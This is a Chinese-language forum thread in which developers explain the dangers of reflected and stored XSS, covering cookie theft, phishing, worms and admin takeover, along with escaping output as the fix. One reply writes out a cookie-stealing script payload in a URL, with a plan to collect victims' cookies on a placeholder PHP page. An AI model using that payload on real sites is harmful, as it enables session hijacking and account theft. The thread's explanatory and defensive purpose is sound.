1
torbrowserbridge 2017-09-04 12:39:49 +08:00 via Android
cookie
|
2
nikoo OP @torbrowserbridge 谢谢,这段代码只能是提交者自己执行
|
3
torbrowserbridge 2017-09-04 12:43:53 +08:00 via Android
检测程序又不知道是不是只能自己执行。
|
4
skyleft 2017-09-04 12:45:24 +08:00 2
xxx.jsp?name=<script>location.href=xxx.php?xx=document.cookie</script> 把这个 url 发给网站的其他用户 然后自己写个 xxx.php 收集登录 cookie 然后登录其他用户的账号 干什么什么
|
5
limhiaoing 2017-09-04 12:45:51 +08:00 via iPhone 2
构造 url 发给其他人打开。
|
6
Zzzzzzzzz 2017-09-04 12:46:21 +08:00 1
偷 cookie
黑产中间跳转页 |
7
torbrowserbridge 2017-09-04 12:46:29 +08:00 via Android
@skyleft 🤤
|
8
nikoo OP |
9
0ZXYDDu796nVCFxq 2017-09-04 12:54:21 +08:00 via iPhone 1
还有存储型的,可以改网站代码,这样任何访问页面的人都有可能中招。
|
11
am241 2017-09-04 13:00:23 +08:00 via Android 1
能以用户的身份提交,获取数据
极端情况下能搞出 xss 蠕虫 |
12
0ZXYDDu796nVCFxq 2017-09-04 13:01:08 +08:00 via iPhone 1
@nikoo 对,这种叫做反射型。
存储型比较常见的方式是论坛、评论区等,当然任何接受用户输入并存储的都有可能存在。 |
13
tony1016 2017-09-04 13:10:30 +08:00
轻者偷你用户的账户信息,重者把访问你的用户变成肉鸡
|
14
shiji 2017-09-04 13:17:08 +08:00 via Android
|
16
maplerecall 2017-09-04 13:21:40 +08:00
可以伪装成用户做任何事情,比如肆意盗取、修改数据,发表广告、不正当言论等等……
其实只要把输出到页面上的外部内容都转义一下就好,也就两三行代码的事情 |
17
Mutoo 2017-09-04 13:48:00 +08:00
反射型的 XXS 有很多玩法,一个不容易注意到的就是利用你的域名的权威性做欺诈。
设想如果 some.qq.com/page/?=xxs-here 存在 xxs 利用漏洞,那就可以在这个页面做钓鱼,更具欺骗性。 |
18
yyfearth 2017-09-04 15:18:17 +08:00
XSS 攻击本身危害可能并不是很大 但是往往是其它类型攻击的入口 如果是存储型 可以影响很多其它用户 就算是纯粹的反射型也可以诱导用户点击 然后注入脚本 盗取 cookie 或者 直接控制用户 代替用户做任何事情
举个例子 如果你是管理员 有人给你发钓鱼邮件 里面有伪装过的 XSS 注入脚本的链接 你点击后 由于你已经管理员账号登陆 可以盗取你的 cookie 就算是 cookie 不可读 也可以用你管理员的身份 创建新管理员账号 或者直接就是破坏 反正你能做的事 注入的脚本也可以 在比如 如果是聊天系统或者可以发送内容的系统 一个人中 XSS 注入脚本就可以利用这个人登陆的账号公开或者对其他账号发送注入的链接达到传播的目的 防范也很简单 基本上就是 根据是 html 内容还是属性进行编码就可以解决 |
19
Gn 2017-09-04 17:59:14 +08:00 via Android
获取 Cookie 算是其一,还可以构造一个登录表单,样式仿造你的网站,这样用户单看域名就很难防范。
|
20
66beta 2017-09-04 18:02:18 +08:00
不用想太多,能执行 JS 就很危险
|
21
yu1u 2017-09-04 18:39:13 +08:00 via iPhone
楼上的已经概括完了
|
22
ctsed 2017-09-04 19:05:00 +08:00 via Android
曾经新浪微博点链接跳转很卡,然后就是莫名关注了几百个号
|